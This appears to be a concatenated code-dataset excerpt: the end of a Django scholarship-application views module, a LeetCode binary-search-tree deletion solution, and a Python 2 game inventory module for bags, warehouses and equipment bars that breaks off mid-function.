RequestContext(request))\n\ndef salidaPdf(f):\n\n def funcion(*args, **kwargs):\n html = f(*args, **kwargs)\n result = StringIO() #creamos una instancia del un objeto StringIO para\n pdf = pisa.pisaDocument( html , result) # convertimos en pdf la template\n return HttpResponse(result.getvalue(), content_type='application/pdf')\n return funcion\n\n\n@salidaPdf\ndef reporte(request):\n if request.method == 'POST':\n documento = request.POST['doc']\n data = FormularioEstimulos.objects.filter(documento=documento).first()\n return render_to_string('reporteincentivo.html',{'data':data})\n\n@csrf_exempt\ndef listaEntrevista(request):\n\n horas = Horas.objects.all()\n if request.method == 'POST':\n if request.POST['busca'] != \"\":\n identificacion = request.POST['busca']\n aspirante = FormularioEstimulos.objects.filter(documento = identificacion)\n if (len(aspirante)>=1):\n agendado = aspirante[0].id\n print (agendado)\n agendadoFecha = Fechas.objects.filter(nombre = agendado)\n agendadoDatos = agendadoFecha[0]\n print (agendadoFecha)\n return render_to_response('resultBusqAgenda.html',{'agendadoDatos':agendadoDatos}, context_instance=RequestContext(request))\n else:\n return render_to_response('noresultados.html',context_instance=RequestContext(request))\n\n if request.POST['hora'] == \"NR\":\n fecha = request.POST['fecha']\n listaHoras = []\n estudianteHora = []\n totalHora = []\n for h in range(len(horas)):\n hor = horas[h].id\n cita = Fechas.objects.filter(fecha = fecha, hora = hor)\n for c in range(len(cita)):\n if c == 0:\n estudianteHora.append(\"hora: \"+horas[h].hora)\n estudianteHora.append(cita[c].nombre.nombre+\" | \"+cita[c].nombre.apellido+\" | C.c \"+cita[c].nombre.documento+\" | Cel: \"+cita[c].nombre.celular)\n return render_to_response('entrevistas.html',{'estudianteHora':estudianteHora, 'fecha':fecha, 'horas':horas},context_instance = RequestContext(request))\n else:\n fecha = request.POST['fecha']\n hora = request.POST['hora']\n estudiante = []\n cita = Fechas.objects.filter(fecha = fecha, hora = hora)\n for c in range(len(cita)):\n estudiante.append(cita[c].nombre.nombre+\" | \"+cita[c].nombre.apellido+\" | C.c \"+cita[c].nombre.documento+\" | Cel: \"+cita[c].nombre.celular)\n return render_to_response('entrevistas.html',{'estudiante':estudiante, 'fecha':fecha, 'horas':horas, 'cita':cita},context_instance = RequestContext(request))\n\n return render_to_response('entrevistas.html',{'horas':horas}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef trazabilidad(request, action):\n traza = Traza()\n traza.usuario = request.user.id\n if (Usuario.objects.filter(id=request.user.id).exists()):\n traza.tipo = 'E'\n elif (Profesor.objects.filter(id=request.user.id).exists()):\n traza.tipo = 'P'\n else:\n traza.tipo = 'A'\n traza.accion = action\n traza.save()\n\ndef editarBusquedaParcialmente(request, pk):\n municipio = Municipios.objects.all().order_by()\n universidad = Universidades.objects.all()\n vereda = Veredas.objects.all()\n colegio = Colegios.objects.all()\n sedes = Sedes.objects.all()\n centrosSena = CentrosSena.objects.all()\n aspiranteEstimulo = FormularioEstimulos.objects.get(id = pk )\n if request.method == 'POST':\n documento = request.POST['4Documento']\n aspirante = FormularioEstimulos.objects.filter(documento = documento)\n if (len(aspirante)>=1): # si existe el aspirante\n fechas = Fechas.objects.all()\n fechasAgendadas = []\n for f in fechas:\n fechasAgendadas.append(f.nombre.id)\n if (aspirante[0].id in fechasAgendadas): # 
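The corrected `salidaPdf` decorator above feeds the HTML string returned by a view (see `reporte`) into xhtml2pdf's `pisa.pisaDocument` and wraps the result as a PDF response. Under Python 3 the buffer would need to be binary; a sketch of that variant, assuming xhtml2pdf accepts an HTML string as source the way the code above does:

```python
from io import BytesIO
from django.http import HttpResponse
from xhtml2pdf import pisa

def salida_pdf(f):
    """Wrap a view that returns an HTML string and respond with the rendered PDF."""
    def funcion(*args, **kwargs):
        html = f(*args, **kwargs)
        result = BytesIO()               # pisa writes binary PDF data
        pisa.pisaDocument(html, result)  # convert the rendered template into a PDF
        return HttpResponse(result.getvalue(), content_type='application/pdf')
    return funcion
```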
si el aspirante esta agendado\n nombreAgendado = aspirante[0].nombre\n documento = aspirante[0].documento\n return render_to_response('formulario_exitoso.html',{'documento':documento}, context_instance=RequestContext(request))\n else:\n formulario = get_object_or_404(FormularioEstimulos, pk=pk)\n formulario.nombre = request.POST['1Nombres']\n formulario.apellido = request.POST['2Apellidos']\n formulario.tipoDocumento = request.POST['3Tipo_documento']\n formulario.documentoOtro = request.POST['documentoOtro']\n formulario.documento = request.POST['4Documento']\n formulario.celular = request.POST['6Celular']\n formulario.edad = request.POST['8Edad']\n formulario.direccionEstudiante = request.POST['12DireEstudiante']\n formulario.ciudadEstudiante = request.POST['Ciudad_estudiante']\n formulario.barrioEstudiante = request.POST['Barrio_vereda_estudiante']\n formulario.ubicacionEstudiante = request.POST['Ubicacion_residencia_estudiante']\n formulario.direccionPadres = request.POST['17DirePadres']\n formulario.ciudadPadres = request.POST['Ciudad_padres']\n formulario.barrioPadres = request.POST['Barrio_vereda_padres']\n formulario.ubicacionPadres = request.POST['Ubicacion_padres']\n formulario.semestreEnCurso = request.POST['semestreEnCurso']\n formulario.valorMatricula = request.POST['32Valor_matricula']\n formulario.totalObtenido = request.POST.getlist('puntajeObtenido')\n formulario.save()\n documento = request.POST['4Documento']\n trazabilidad(request, documento)\n nombre = request.POST['1Nombres']\n nombreAgendado = request.POST['1Nombres']\n documen = documento\n return render_to_response('formulario_exitoso.html',{'documento':documento}, context_instance=RequestContext(request))\n return render_to_response('editarFormularioPorUsuario.html',{'aspiranteEstimulo':aspiranteEstimulo, 'municipio':municipio, 'universidad':universidad, 'vereda':vereda, 'colegio':colegio, 'sedes':sedes, 'centrosSena':centrosSena }, context_instance=RequestContext(request))\n return render_to_response('editarFormularioPorUsuario.html',{'aspiranteEstimulo':aspiranteEstimulo, 'municipio':municipio, 'universidad':universidad, 'vereda':vereda, 'colegio':colegio, 'sedes':sedes, 'centrosSena':centrosSena }, context_instance=RequestContext(request))\n\n\ndef editarFormularioUsuario(request):\n return render_to_response('editarFormularioPorUsuario.html',context_instance = RequestContext(request))\n","sub_path":"proyecto/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":67172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"166496700","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\nhttps://leetcode.com/problems/delete-node-in-a-bst/description/\n\nGiven a root node reference of a BST and a key,\ndelete the node with the given key in the BST.\nReturn the root node reference (possibly updated) of the BST.\n\nBasically, the deletion can be divided into two stages:\n\nSearch for a node to remove.\nIf the node is found, delete the node.\nNote: Time complexity should be O(height of tree).\n\n\nExample:\nroot = [5,3,6,2,4,null,7]\nkey = 3\n\n 5\n / \\\n 3 6\n / \\ \\\n2 4 7\n\nGiven key to delete is 3. 
So we find the node with value 3 and delete it.\n\nOne valid answer is [5,4,6,2,null,null,7], shown in the following BST.\n\n 5\n / \\\n 4 6\n / \\\n2 7\n\nAnother valid answer is [5,2,6,null,4,null,7].\n\n 5\n / \\\n 2 6\n \\ \\\n 4 7\n\nStrategy: promote the largest node of the left subtree into the deleted node's position.\n\"\"\"\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n def deleteNode(self, root, key):\n \"\"\"\n :type root: TreeNode\n :type key: int\n :rtype: TreeNode\n \"\"\"\n def dfs(node):\n if node.right:\n return dfs(node.right)\n return node\n\n def find(node):\n next = None\n\n if not node:\n return\n elif node.val < key:\n next = find(node.right)\n node.right = next\n return node\n elif node.val > key:\n next = find(node.left)\n node.left = next\n return node\n else:\n retNode = None\n\n if node.left:\n retNode = node.left\n rightMost = dfs(node.left)\n rightMost.right = node.right\n else:\n retNode = node.right\n\n return retNode\n\n return find(root)\n\ndef build():\n \"\"\"\n 3\n / \\\n 9 20\n / \\\n 15 7\n \"\"\"\n root = TreeNode(3)\n root.left = TreeNode(9)\n root.right = TreeNode(20)\n root.right.right = TreeNode(7)\n root.right.left = TreeNode(15)\n return root, 20\n\ndef pp(node):\n root = [node]\n\n while root:\n print([n.val for n in root])\n root = [child for n in root for child in (n.left, n.right) if child]\n\n\nif __name__ == \"__main__\":\n s = Solution()\n pp(s.deleteNode(*build()))\n","sub_path":"tree/450_Delete_Node_in_a_BST.py","file_name":"450_Delete_Node_in_a_BST.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"599362972","text":"#coding=utf-8\n'''Item storage: bag (beibao), warehouse (cangku), equipment bar and lug (luggage) bar\n'''\n\nimport cPickle\nimport logging\nimport re\nfrom yuanneng.map.map import Map\nfrom copy import copy\nfrom yuanneng.cmd import *\nfrom yuanneng import prop\nfrom yuanneng.prop import *\nfrom yuanneng.equip import *\nfrom yuanneng.prop import apply as apply_prop\nfrom yuanneng.prop import new as new_prop\nfrom yuanneng.equip import apply as apply_equip\nfrom yuanneng.equip import query_typ as query_equip_typ\nfrom yuanneng.equip import calc_eqp_attr, attack_pos, def_pos, cal_eqp_buff\nfrom yuanneng.item import *\nfrom yuanneng.proto import item_pb2, role_pb2\nfrom yuanneng.proto import login_pb2\nfrom math import ceil\nfrom yuanneng import item\nfrom yuanneng.status import *\nfrom yuanneng import equip\nfrom yuanneng.produce import PRODUCER,add_to_producers\n\nMOUNT_EQP_IDX = TYP_MOUNT - 1 #index of the mount slot in the equipment bar\nWAREHOUSE_MANAGER = 50048 #warehouse manager NPC\nDEF_BEIBAO_SZ = 32 #initial bag capacity\nCANGKU_SZ = 25 #warehouse page size\nCANGKU_PROP = 28036 #warehouse storage chest item\nEQP_BAR_SZ = 17 #equipment bar size\nLUG_BAR_SZ = 2 #lug bar size\nCANNT_USE_ITEM = -18 #status in which items cannot be used\nITEM_NOT_EXIST = -8 #item missing or bad slot index\nNOT_LUG = -6 #item is not a lug\nLUG_POS_OVERFLOW = -7 #lug bar index out of range\nCANNT_DRAG_TO = -9\nBAG_FULL = -10 #bag is full\nTRADE_LOCKED = -8 #item locked by a pending trade\nBAG_IDX_INVALID = -9\nERR_FORMAT = -20 #bad slot number\ndef bag_cmper(i1, i2):\n if not i1:\n return 1\n if not i2:\n return -1\n tid1, tid2 = i1[KEY_TID], i2[KEY_TID]\n\n if tid1 > tid2:\n return 1\n elif tid1 == tid2:\n if KEY_AMOUNT not in i1:\n return 0\n return -1 if i1[KEY_AMOUNT] > i2[KEY_AMOUNT] else 1\n else:\n return -1\n\nclass UserItemStore(object):\n def restore_beibao(self,data):\n '''Load bag data'''\n if data is None:\n logging.warn('restore beibao:data is None,user gid:%s',self.gid)\n self.init_beibao()\n else:\n try:\n self.beibao = 
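`deleteNode` above follows the strategy in its docstring: splice the left subtree's maximum into the removed node's place. For comparison, a sketch of the symmetric textbook variant that promotes the in-order successor (the smallest node of the right subtree) instead:

```python
def delete_node(root, key):
    """Recursive BST delete using the in-order successor."""
    if not root:
        return None
    if key < root.val:
        root.left = delete_node(root.left, key)
    elif key > root.val:
        root.right = delete_node(root.right, key)
    else:
        if not root.left:
            return root.right
        if not root.right:
            return root.left
        # Replace with the smallest value in the right subtree,
        # then delete that value from the right subtree.
        succ = root.right
        while succ.left:
            succ = succ.left
        root.val = succ.val
        root.right = delete_node(root.right, succ.val)
    return root
```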
cPickle.loads(data)\n except:\n logging.warn(\"failed to restore beibao data,user gid :%s,reset to init value\",self.gid,exc_info = True)\n self.init_beibao()\n\n def restore_eqp_bar(self,data):\n '''加载装备栏'''\n if data is None:\n logging.warn('restore eqp_bar,data is None,user gid:%s',self.gid)\n self.init_eqp_bar()\n else:\n self.eqp_bar = cPickle.loads(data)\n\n def set_lug_bar_item(self,idx,item):\n self.lug_bar[idx] = item\n self.show_lug_bar_item(idx)\n\n def pop_eqp_bar_item(self,idx,broad = True):\n item = self.eqp_bar[idx]\n self.eqp_bar[idx] = None\n if item and broad:\n self.show_eqp_item(idx)\n return item\n\n def set_eqp_bar_item(self,idx,item):\n self.eqp_bar[idx] = item\n self.show_eqp_item(idx)\n\n def restore_lug_bar(self,data):\n '''加载行囊栏数据'''\n if data is None:\n logging.warn(\"restore lug_bar:data is None,user gid:%s\",self.gid)\n self.init_lug_bar()\n else:\n try:\n self.lug_bar = cPickle.loads(data)\n except:\n logging.warn(\"failed to restore lugbar ,user gid:%s,reset to init value\",self.gid,exc_info = True)\n self.init_lug_bar()\n\n def restore_cangku(self,data):\n '''加载仓库数据'''\n if data is None:\n logging.warn('restore cangku:data is None,user gid:%s',self.gid)\n self.init_cangku()\n else:\n try:\n self.cangku = cPickle.loads(data)\n except:\n logging.warn(\"failed to restore cangku,user gid : %s,reset to init value\",self.gid, exc_info = True)\n self.init_cangku()\n\n def get_beibao_data(self):\n '''序列化背包数据'''\n return cPickle.dumps(self.beibao,cPickle.HIGHEST_PROTOCOL)\n\n def get_eqp_bar_pb_data(self):\n '''\n 获取使用protobuf系列化的角色装备栏数据\n 用于缓存角色的装备信息(避免多次序列化)\n '''\n res = item_pb2.OthersStoreRes()\n res.id = self.gid\n get_store_pb2(self.eqp_bar, res = res.store)\n res.name = self.name\n res.level = self.level\n res.gender = self.gender\n res.pro = self.pro\n return res.SerializeToString()\n\n def get_eqp_bar_data(self):\n '''序列化装备栏数据'''\n return cPickle.dumps(self.eqp_bar,cPickle.HIGHEST_PROTOCOL)\n\n # def get_lug_data(self):\n # '''序列化行囊包裹数据'''\n # return cPickle.dumps(self.lug,cPickle.HIGHEST_PROTOCOL)\n\n def get_lug_bar_data(self):\n '''序列化行囊栏数据'''\n return cPickle.dumps(self.lug_bar,cPickle.HIGHEST_PROTOCOL)\n\n def get_cangku_data(self):\n '''序列化仓库数据'''\n return cPickle.dumps(self.cangku,cPickle.HIGHEST_PROTOCOL)\n\n def init_beibao(self):\n '''设置背包数据,此方法主要在角色创建时调用'''\n self.beibao = [0] * DEF_BEIBAO_SZ\n #送礼包方式待定\n #self.beibao[0] = new_prop(21024 + self.pro,1,1)\n\n def init_eqp_bar(self):\n '''设置装备栏数据,此方map_broad_it法主要在角色创建时调用'''\n self.eqp_bar = [0] * EQP_BAR_SZ\n self.eqp_bar[12] = {KEY_TID: 10131,KEY_BIND : True, KEY_STAR : 3, KEY_COLOR : 3, KEY_STREN : 0, KEY_NAIJIU: 200 * 1000, KEY_REPAIR_CNT : 3,\n KEY_EXTRA: {'wlgj':30,'jsgj':30,'mz':20}}\n\n # def set_lug(self,lug):\n # '''设置行囊包裹数据,此方法主要在角色创建时调用'''\n # self.lug = lug\n\n def init_lug_bar(self):\n '''设置行囊栏数据,此方法主要在角色创建时调用'''\n self.lug_bar = [0] * LUG_BAR_SZ\n\n def init_cangku(self):\n '''设置仓库数据,此方法主要在角色创建时调用'''\n self.cangku = [0] * CANGKU_SZ\n\n def show_beibao_item(self,idx):\n '''向客户端同步背包某一个格子的数据\n idx为格子索引,从0开始'''\n res = item_pb2.StoreItem()\n res.position = idx + 1\n fill_storeitem_pb2(self.beibao[idx],res)\n self.tell_object('E02',1,res)\n\n def show_cangku_item(self,idx):\n '''向客户端同步仓库某一个格子的数据\n idx为格子索引,从0开始'''\n res = item_pb2.StoreItem()\n res.position = idx + 1\n fill_storeitem_pb2(self.cangku[idx],res)\n self.tell_object('E02',2,res)\n\n def show_lug_bar_item(self,idx):\n '''向客户端同步行囊栏一个格子的数据\n idx为格子索引,从0开始'''\n res = item_pb2.StoreItem()\n res.position = idx + 1\n 
fill_storeitem_pb2(self.lug_bar[idx],res)\n self.tell_object('E02',11,res)\n\n def show_eqp_item(self,idx):\n '''向客户端同步行囊栏一个格子的数据\n idx为格子索引,从0开始'''\n res = item_pb2.StoreItem()\n res.position = idx + 1\n fill_storeitem_pb2(self.eqp_bar[idx],res)\n self.tell_object('E02',3,res)\n\n\n def reduce_items(self,reduce_items):\n '''\n 从背包扣除物品\n 调用前应该先调用has_enough_items进行校验\n 扣除成功返回True\n 失败返回False 但有可能扣除掉一部分物品(所以需要先校验)\n 扣除物品顺序:先扣除绑定的,然后扣除非绑定的\n '''\n reduce_items = copy(reduce_items)\n unbind_item = {}\n beibao = self.beibao\n for idx,item in enumerate(beibao):\n if not item:\n continue\n tid = item[KEY_TID]\n if tid not in reduce_items:\n continue\n if not item[KEY_BIND]:\n if tid not in unbind_item:\n unbind_item[tid] = [idx]\n else:\n unbind_item[tid].append(idx)\n continue\n need_amount = reduce_items[tid]\n current_amount = item.get(KEY_AMOUNT,1)\n if current_amount <= need_amount:\n #直接删掉物品\n self.empty_beibao_item(idx)\n else:\n item[KEY_AMOUNT] -= need_amount\n self.show_beibao_item(idx)\n if current_amount >= need_amount:\n del reduce_items[tid]\n if not reduce_items:\n return True\n else:\n reduce_items[tid] -= current_amount\n for tid, idxs in unbind_item.iteritems():\n if tid not in reduce_items:\n continue\n for idx in idxs:\n item = beibao[idx]\n need_amount = reduce_items[tid]\n current_amount = item.get(KEY_AMOUNT,1)\n if current_amount <= need_amount:\n self.empty_beibao_item(idx)\n else:\n item[KEY_AMOUNT] -= need_amount\n self.show_beibao_item(idx)\n if current_amount >= need_amount:\n del reduce_items[tid]\n if not reduce_items:\n return True\n break\n else:\n reduce_items[tid] -= current_amount\n return not reduce_items\n\n\n def has_enough_items(self,need_item):\n '''校验背包中是否有足够的物品\n need_item 物品dict,key为物品模板id,value为需要数量\n '''\n need_item = copy(need_item)\n for item in self.beibao:\n if not item:\n continue\n tid = item[KEY_TID]\n if tid not in need_item:\n continue\n need_item[tid] -= item.get(KEY_AMOUNT,1)\n if need_item[tid] <= 0:\n del need_item[tid]\n if not need_item:\n return True\n return not need_item\n\n def combine_items(self):\n ''' 整合背包的物品 '''\n for idx,item in enumerate(self.beibao):\n if not item or not is_prop(item[KEY_TID]):\n continue\n max_stack = query_max_stack(item[KEY_TID])\n if item[KEY_AMOUNT] >= max_stack:\n continue\n for combine_idx in xrange(0,idx):\n combine_item = self.beibao[combine_idx]\n if not combine_item or combine_item[KEY_TID] != item[KEY_TID] or combine_item[KEY_BIND] != item[KEY_BIND] or not is_prop(combine_item[KEY_TID]) or combine_item[KEY_AMOUNT] >= query_max_stack(combine_item[KEY_TID]):\n continue\n max_combine = max_stack - combine_item[KEY_AMOUNT]\n if item[KEY_AMOUNT] <= max_combine:\n self.beibao[idx] = 0\n combine_item[KEY_AMOUNT] += item[KEY_AMOUNT]\n break\n else:\n combine_item[KEY_AMOUNT] = max_stack\n item[KEY_AMOUNT] -= max_combine\n\n def combine_cangku_items(self):\n ''' 整合仓库的物品 '''\n for idx,item in enumerate(self.cangku):\n if not item or not is_prop(item[KEY_TID]):\n continue\n max_stack = query_max_stack(item[KEY_TID])\n if item[KEY_AMOUNT] >= max_stack:\n continue\n for combine_idx in xrange(0,idx):\n combine_item = self.cangku[combine_idx]\n if not combine_item or combine_item[KEY_TID] != item[KEY_TID] or combine_item[KEY_BIND] != item[KEY_BIND] or not is_prop(combine_item[KEY_TID]) or combine_item[KEY_AMOUNT] >= query_max_stack(combine_item[KEY_TID]):\n continue\n max_combine = max_stack - combine_item[KEY_AMOUNT]\n if item[KEY_AMOUNT] <= max_combine:\n self.cangku[idx] = 0\n combine_item[KEY_AMOUNT] += 
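`combine_items` and `combine_cangku_items` above fold partial stacks of the same template id and bind state together, capped by `query_max_stack`. The core merge step in isolation, as a hypothetical helper over plain dicts where `'amount'` stands in for this module's `KEY_AMOUNT` field:

```python
def merge_stacks(dst, src, max_stack):
    """Move as much of `src` into `dst` as the stack cap allows.

    Both arguments are item dicts assumed to share tid and bind state.
    Returns the amount left in `src` (0 means the source stack emptied).
    """
    room = max_stack - dst['amount']
    moved = min(room, src['amount'])
    dst['amount'] += moved
    src['amount'] -= moved
    return src['amount']

# e.g. merge_stacks({'amount': 90}, {'amount': 30}, 99) moves 9 and leaves 21 behind
```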
item[KEY_AMOUNT]\n break\n else:\n combine_item[KEY_AMOUNT] = max_stack\n item[KEY_AMOUNT] -= max_combine\n\n def combine_to_bag(self,item,lock_seg = None):\n '''Merge a stackable item into an existing bag stack\n item: the item to merge\n lock_seg: locked slot segment of the bag as a tuple (start idx, end idx); None means no lock\n Returns True on success and pushes the changed slot to the client\n Returns False on failure\n '''\n tid = item[KEY_TID]\n amount = item[KEY_AMOUNT]\n max_stack = query_max_stack(tid)\n bind = item[KEY_BIND]\n for idx,grid in enumerate(self.beibao):\n if lock_seg:\n if idx >= lock_seg[0] and idx <= lock_seg[1]:\n continue\n if not grid or grid[KEY_TID] != tid or grid[KEY_BIND] != bind:\n continue\n if grid[KEY_AMOUNT] + amount > max_stack:\n continue\n grid[KEY_AMOUNT] += amount\n self.show_beibao_item(idx)\n return True\n return False\n\n def combine_to_cangku(self,item):\n '''Merge a stackable item into an existing warehouse stack\n item: the item to merge\n Returns True on success and pushes the changed slot to the client\n Returns False on failure\n '''\n tid = item[KEY_TID]\n amount = item[KEY_AMOUNT]\n max_stack = query_max_stack(tid)\n bind = item[KEY_BIND]\n for idx,grid in enumerate(self.cangku):\n if not grid or grid[KEY_TID] != tid or grid[KEY_BIND] != bind:\n continue\n if grid[KEY_AMOUNT] + amount > max_stack:\n continue\n grid[KEY_AMOUNT] += amount\n self.show_cangku_item(idx)\n return True\n return False\n\n def add_to_bag(self,item,lock_seg = None,can_combine = True):\n '''Store an item into the bag\n item: the item to store\n lock_seg: locked slot segment of the bag as a tuple (start idx, end idx); None means no lock\n Returns True on success, False on failure\n '''\n if not item:\n logging.warn(\"add_to_bag, item is empty, gid:%s\", self.gid)\n return\n if is_prop(item[KEY_TID]) and (query_max_stack(item[KEY_TID]) > item[KEY_AMOUNT]) and can_combine:\n if self.combine_to_bag(item,lock_seg = lock_seg):\n return True\n for idx,grid in enumerate(self.beibao):\n if lock_seg:\n if idx >= lock_seg[0] and idx <= lock_seg[1]:\n continue\n if not grid:\n self.beibao[idx] = item\n self.show_beibao_item(idx)\n return True\n return False\n\n def add_to_cangku(self,item,can_combine = True):\n '''Store an item into the warehouse\n item: the item to store\n Returns True on success, False on failure\n '''\n if not item:\n logging.warn(\"add_to_cangku, item is empty, gid:%s\", self.gid)\n return\n if is_prop(item[KEY_TID]) and (query_max_stack(item[KEY_TID]) > item[KEY_AMOUNT]) and can_combine:\n if self.combine_to_cangku(item):\n return True\n for idx,grid in enumerate(self.cangku):\n if not grid:\n self.cangku[idx] = item\n self.show_cangku_item(idx)\n return True\n return False\n\n def query_empty_count(self,lock_seg = None):\n '''Count the empty bag slots'''\n if not lock_seg:\n data = self.beibao\n else:\n data = self.beibao[:lock_seg[0]] + self.beibao[lock_seg[1]:]\n return sum(item is None or item == 0 for item in data)\n\n def query_cangku_empty_count(self):\n '''Count the empty warehouse slots'''\n return sum(item is None or item == 0 for item in self.cangku)\n\n def has_item(self,tid,bind = None):\n '''Check whether the bag holds an item of the given template'''\n for item in self.beibao:\n if not item:\n continue\n if tid == item[KEY_TID]:\n if bind is None:\n return True\n else:\n if bind == item[KEY_BIND]:\n return True\n return False\n\n def reduce_item_by_idx(self,idx):\n item = self.beibao[idx]\n if not item:\n return False\n if item[KEY_AMOUNT] > 1:\n item[KEY_AMOUNT] -= 1\n self.show_beibao_item(idx)\n else:\n self.empty_beibao_item(idx)\n\n\n def add_ck_money(self, val):\n self.ck_money += val\n\n def reduce_ck_money(self, val):\n self.ck_money -= val\n\n def has_ck_money(self, val):\n return self.ck_money >= val\n\n def empty_beibao_item(self,idx,broad = True):\n '''Clear one bag slot\n idx is the slot index, zero-based'''\n self.beibao[idx] = 0\n if broad:\n 
self.show_beibao_item(idx)\n\n def empty_cangku_item(self,idx,broad = True):\n '''删除仓库某个格子的数据\n idx为索引号,从0开始'''\n self.cangku[idx] = 0\n if broad:\n self.show_cangku_item(idx)\n\n def empty_eqp_item(self,idx,broad = True):\n '''删除装备栏某个格子的数据\n idx为索引号,从0开始'''\n self.eqp_bar[idx] = 0\n if broad:\n self.show_eqp_item(idx)\n\n def empty_lug_item(self,idx):\n '''删掉行囊栏某个格子的数据,如果后续有行囊,则将后续的迁移\n 只负责行囊栏数据,不负责相应的背包数据\n idx为索引号,从0开始'''\n self.lug_bar[idx] = 0\n for i in range(idx + 1, len(self.lug_bar)):\n if self.lug_bar[i]:\n self.lug_bar[i - 1] = self.lug_bar[i]\n self.lug_bar[i] = 0\n self.tell_object('E01',6,get_store_pb2(self.lug_bar))\n\n def extend_beibao(self,size):\n oldlen = len(self.beibao)\n newlen = oldlen + size\n self.beibao = self.beibao + [0] * size\n\n self.tell_object('E01',1,get_store_pb2(self.beibao,(oldlen,newlen)))\n\n def query_used_count(self,start_idx,end_idx):\n '''查询角色背包某一段使用的格子数'''\n return sum(item is not None and item != 0 for item in self.beibao[start_idx : end_idx])\n\n def reset_beibao_seg(self,start_idx,end_idx,new_lug_size):\n '''将背包中一段的数据重置大小'''\n before = self.beibao[:start_idx]\n after = self.beibao[end_idx:]\n seg = self.beibao[start_idx : end_idx]\n new_seg = [0] * new_lug_size\n new_idx = 0\n for item in seg:\n if item:\n new_seg[new_idx] = item\n new_idx += 1\n self.beibao = before + new_seg + after\n self.tell_object('E01',1,get_store_pb2(self.beibao,(start_idx, len(self.beibao))))\n\ndef fill_storeitem_pb2(item,pb2_obj):\n '''填充物品的protobuf数据对象'''\n if not item:\n pb2_obj.empty = True\n return\n pb2_obj.empty = False\n fill_item_pb2(item,pb2_obj.item)\n\ndef fill_item_pb2(item,pb2_obj,with_amount = True):\n pb2_obj.tid = item[KEY_TID]\n pb2_obj.bind = item[KEY_BIND]\n if is_prop(item[KEY_TID]):\n if with_amount:\n pb2_obj.amount = item[KEY_AMOUNT]\n elif query_equip_typ(item[KEY_TID]) != TYP_MOUNT:\n equip_obj = pb2_obj.equip_info\n equip_obj.stren = item[KEY_STREN]\n equip_obj.star = item[KEY_STAR]\n equip_obj.color = item[KEY_COLOR]\n equip_obj.repair_cnt = item[KEY_REPAIR_CNT]\n #服务器存储耐久度 × 1000,每次向上取整通知客户端\n equip_obj.naijiu = int (ceil(item[KEY_NAIJIU] / 1000.0))\n for k,v in item[KEY_EXTRA].items():\n ext = equip_obj.extra.add()\n ext.key, ext.value = k, v\n if KEY_ZIZHI in item:\n equip_obj.zizhi.value1, equip_obj.zizhi.value2 = item[KEY_ZIZHI]\n if KEY_HOLE in item:\n for stone_id in item[KEY_HOLE]:\n equip_obj.holes.append(stone_id)\n if KEY_SANCTIFICATION in item:\n equip_obj.san_lvl = item[KEY_SANCTIFICATION][1]\n equip_obj.san_kind = item[KEY_SANCTIFICATION][0]\n if KEY_FULING in item:\n for buffid, lv in item[KEY_FULING]:\n fuling = equip_obj.fuling.add()\n fuling.buffid = buffid\n fuling.level = lv\n if REMAKE_LEVEL in item:\n equip_obj.changelevel = item[REMAKE_LEVEL]\n\ndef get_store_pb2(store,seg = None,res = None):\n '''格式化背包/仓库/装备栏/行囊栏的数据(用来发送给客户端)\n 当只格式化某一段的数据时,可使用seg指定开始和结束的位置\n 两者都从0开始,包含起始,不包含结束,如(0,3) -> 0,1,2\n '''\n if not res:\n res = item_pb2.StoreRes()\n res.size = len(store)\n if seg:\n start,end = seg[0],seg[1]\n else:\n start,end = 0,res.size\n\n for idx in range(start,end):\n item_pb = res.items.add()\n item_pb.position = idx + 1\n fill_storeitem_pb2(store[idx],item_pb)\n return res\n\n@route('E01',require_para = login_pb2.FlagReq)\n@cmd_exception_catch()\ndef show_store(obj,data):\n '''显示背包/仓库/行囊栏的内容\n '''\n arg = data.flag\n if arg == 1:\n obj.tell_object('E01', arg, get_store_pb2(obj.beibao))\n elif arg == 2:\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n res = 
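`fill_item_pb2` above encodes the durability convention: the server keeps `naijiu` scaled by 1000 so wear can be fractional, and reports `ceil(naijiu / 1000)` to the client, so an item with only partial wear still displays its current whole point. A quick stdlib-only check of that rounding:

```python
from math import ceil

naijiu = 200 * 1000                        # a fresh item, as in init_eqp_bar
naijiu -= 999                              # lose just under one point of wear
assert int(ceil(naijiu / 1000.0)) == 200   # still displays 200
assert int(ceil(199000 / 1000.0)) == 199   # a full point gone drops the display
```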
get_store_pb2(obj.cangku)\n res.money = obj.ck_money\n obj.tell_object('E01', arg, res)\n elif arg == 3:\n obj.tell_object('E01', arg, get_store_pb2(obj.eqp_bar))\n elif arg == 4:\n pass\n elif arg == 5:\n pass\n elif arg == 6:\n obj.tell_object('E01', arg, get_store_pb2(obj.lug_bar))\n\n@route('E03',require_para = item_pb2.PositionReq)\n@cmd_exception_catch()\ndef use_item(obj,data):\n '''使用物品'''\n if not obj.valid_use_item():\n obj.tell_object('E03',CANNT_USE_ITEM)\n return\n idx = data.position - 1\n if idx < 0 or idx >= len(obj.beibao):\n obj.tell_object('E03',ITEM_NOT_EXIST)\n return\n item = obj.beibao[idx]\n if not item:\n obj.tell_object('E03',ITEM_NOT_EXIST)\n return\n if item[KEY_TID] in PRODUCER:\n add_to_producers(obj, idx, item)\n return\n elif is_prop(item[KEY_TID]):\n result = apply_prop(obj,idx,item)\n else:\n result = apply_equip(obj,idx,item)\n\n if isinstance(result, int) and result < 0:\n obj.tell_object('E03',result)\n else:\n if data.taskid:\n obj.task_use_item(item[KEY_TID], data.taskid)\n obj.tell_object('E03',1)\n\n\n@route('E04',require_para = item_pb2.PositionReq)\n@cmd_exception_catch()\ndef drop_item(obj,data):\n idx = int(data.position) - 1\n if not obj.valid_use_item():\n obj.tell_object('E04',CANNT_USE_ITEM)\n return\n if idx < 0 or idx >= len(obj.beibao):\n obj.tell_object('E04',ITEM_NOT_EXIST)\n return\n item = obj.beibao[idx]\n if not item:\n obj.tell_object('E04',ITEM_NOT_EXIST)\n return\n# if not item[KEY_BIND]:\n# 